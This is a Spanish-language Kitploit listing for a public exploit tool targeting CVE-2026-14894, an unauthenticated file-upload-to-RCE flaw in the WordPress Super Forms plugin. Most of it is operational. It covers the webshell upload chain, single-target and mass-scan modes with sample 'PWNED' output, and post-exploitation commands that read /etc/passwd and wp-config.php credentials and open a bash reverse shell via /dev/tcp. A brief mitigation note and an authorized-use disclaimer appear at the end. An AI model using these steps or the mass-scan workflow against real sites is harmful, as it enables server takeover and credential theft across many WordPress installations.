Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-14894 — Exploit PoC para CVE-2026-14894: carga de archivos arbitraria no autenticada que conduce a ejecución remota de código en el plugin Super Forms de WordPress. Incluye modos de escaneo objetivo único y masivo con descubrimiento automatizado de shells. | Kitploit
Herramientas/GitHubGitHub/1beelze/cve-2026-14894
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónRed Teaming
GitHub1beelze/cve-2026-14894

CVE-2026-14894

Exploit PoC para CVE-2026-14894: carga de archivos arbitraria no autenticada que conduce a ejecución remota de código en el plugin Super Forms de WordPress. Incluye modos de escaneo objetivo único y masivo con descubrimiento automatizado de shells.

Ver Repositorio
hace 1 mesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2026-14894 — Super Forms ≤ 6.3.313


Resumen

Carga de archivos arbitraria no autenticada → Ejecución remota de código en el plugin de WordPress Super Forms versiones ≤ 6.3.313.

La vulnerabilidad reside en el manejador AJAX super_submit_form que procesa las subidas de archivos a través de un campo datauristring sin validar la extensión del archivo ni el tipo MIME antes de escribir en disco. Un atacante no autenticado puede subir un webshell PHP y lograr la ejecución remota completa de código en el servidor objetivo.


Detalles de la vulnerabilidad


Cadena de ataque

root@kitploit:~
[1] Mint nonce (nopriv)
    POST /wp-admin/admin-ajax.php
    action=super_create_nonce
         │
         ▼
[2] Upload PHP shell via datauristring (unauthenticated)
    POST /wp-admin/admin-ajax.php
    action=super_submit_form
    data={"sf_upload_field":{"files":[{"datauristring":"data:image/png;base64,..."}]}}
         │
         ├── Path Traversal → /wp-content/themes/<theme>/shell.php  ← primary
         │                                                             (always exec)
         │
         └── Random folder → /wp-content/uploads/superforms/...      ← fallback
                              (exec depends on server policy)
         │
         ▼
[3] Shell Discovery
    ├── S0: media?parent=entry_id  (WP REST)
    ├── S1: REST /wp/v2/media search (unauth)
    ├── S2: Apache/nginx directory listing
    └── S3: WP sitemap attachment XML
         │
         ▼
[4] RCE → curl "http://target/wp-content/themes/theme/shell.php?c=id"

Requisitos

root@kitploit:~
pip install requests urllib3
  • Python 3.8+
  • Acceso de red al sitio WordPress objetivo

Uso

Objetivo único

root@kitploit:~
python cve-2026-14894.py
root@kitploit:~
  CVE-2026-14894  │  Super Forms ≤ 6.3.313
  Unauthenticated File Upload → Remote Code Execution
  Researcher: andrea bocchetti  |  PoC: Beelze

  1  Single target
  2  Mass targets (file)

  Mode (1/2): 1

  Target URL               : https://target.com
  Form ID  (enter=auto)    :                      ← leave blank = auto-discover
  Shell name (enter=random):                      ← leave blank = random name
  Shell file (enter=built-in):                    ← leave blank = built-in shell
  WP user  (optional/REST) :                      ← optional, improves discovery
  WP pass  (optional/REST) :                      ← optional

Resultado esperado en caso de éxito:

root@kitploit:~
  ──────────────────────────────────────────────────────────────
  TARGET  https://target.com
  ──────────────────────────────────────────────────────────────

  Super Forms v6.3.301  vulnerable ≤6.3.313
  [1/3] Mint nonce  ......................  ✔  OK  a3f9e1c...  sid=sess_ab...
  [2/3] Upload [xkqmhzjt.php]  ..........  ✔  OK  form_id=42  entry_id=137
  [3/3] Shell discovery  ................  ✔  FOUND → RCE [path traversal → theme]

  ╔══════════════════════════════════════════════════════════════╗
  ║  ✓  PWNED → RCE CONFIRMADO                                   ║
  ║                                                              ║
  ║  Shell  »  https://target.com/wp-content/themes/astra/shell ║
  ║  RCE    »  uid=33(www-data) gid=33(www-data)                ║
  ║                                                              ║
  ║  $ curl "https://target.com/...shell.php?c=whoami"          ║
  ╚══════════════════════════════════════════════════════════════╝

Escaneo masivo

root@kitploit:~
  Mode (1/2): 2

  Targets file             : targets.txt     ← one URL per line, # = comment
  Form ID  (enter=auto)    :
  Threads  (enter=5)       : 10
  Shell file (enter=built-in):
  WP user  (optional/REST) :
  WP pass  (optional/REST) :

Formato de targets.txt:

root@kitploit:~
# Bug bounty scope
https://site1.com
https://site2.com
https://site3.com

Salida del escaneo masivo:

root@kitploit:~
  ══════════════════════════════════════════════════════════════
  MASS SCAN  3 targets  threads=10
  ══════════════════════════════════════════════════════════════

  [01/03]  https://site1.com  ....  RCE     uid=33(www-data)
           ↳ https://site1.com/wp-content/themes/astra/xkqmhzjt.php
  [02/03]  https://site2.com  ....  WRITE   no exec
           ↳ https://site2.com/wp-content/uploads/superforms/2026/07/.../shell.php
  [03/03]  https://site3.com  ....  FAIL    plugin inactive / blocked

  ══════════════════════════════════════════════════════════════
  SUMMARY  1 RCE  1 WRITE_ONLY  0 MAYBE  / 3 total
  ══════════════════════════════════════════════════════════════

  RCE SHELLS:
  »  https://site1.com/wp-content/themes/astra/xkqmhzjt.php  (uid=33...)

Shell personalizado

Puedes proporcionar tu propio archivo de shell en lugar del webshell incorporado:

root@kitploit:~
  Shell file (enter=built-in): /path/to/myshell.php

La herramienta subirá tu archivo y tratará cualquier respuesta 200 con un cuerpo no vacío como confirmación de RCE.


Interacción con el shell

Después de obtener RCE, interactúa con el shell:

root@kitploit:~
# Command execution
curl -sk "https://target.com/wp-content/themes/theme/shell.php?c=id"
curl -sk "https://target.com/wp-content/themes/theme/shell.php?c=cat+/etc/passwd"

# Read WordPress config (creds, DB)
curl -sk "https://target.com/.../shell.php?c=cat+/var/www/html/wp-config.php"

# Reverse shell
curl -sk "https://target.com/.../shell.php" --data "c=bash+-c+'bash+-i+>%26+/dev/tcp/LHOST/LPORT+0>%261'"

Salidas

Los resultados se guardan automáticamente en:

root@kitploit:~
~/Documents/CVE-2026-14894/result_YYYYMMDD_HHMMSS.json

Códigos de estado

EstadoSignificado
RCEShell PHP confirmado ejecutándose — ejecución remota completa de código

Mitigación

Actualiza Super Forms a ≥ 6.3.314. El parche fuerza la extensión solo .pdf en las subidas datauristring y añade contención con realpath() para evitar el path traversal.


Descargo de responsabilidad

Esta herramienta está destinada únicamente a pruebas de penetración autorizadas, investigación de bug bounty y fines educativos.
No la uses contra sistemas para los que no tengas permiso explícito por escrito.
El autor no se hace responsable de ningún uso indebido o daño causado por esta herramienta.


CVE-2026-14894 · Super Forms ≤ 6.3.313 · Carga de archivos RCE no autenticada
Investigador: andrea bocchetti · PoC: Beelze

Descargar herramienta
CampoDetalle
CVE IDCVE-2026-14894
PluginSuper Forms (WordPress)
Afectado≤ 6.3.313
Parcheado6.3.314 (fuerza extensión .pdf + contención realpath)
CVSS9.8 Crítico
Auth requeridaNinguna
Investigadorandrea bocchetti
Acción AJAXsuper_submit_form
Sumiderocampo datauristring → class-ajax.php:2762–2766
Ruta de subida/wp-content/uploads/superforms/YYYY/MM/<13digits>/
WRITE_ONLYArchivo escrito pero PHP no ejecutado (motor apagado / denegación .htaccess)
POSSIBLE_WRITELa subida devolvió éxito pero la URL del shell no pudo resolverse
FAILPlugin inactivo, nonce fallido o versión parchada detectada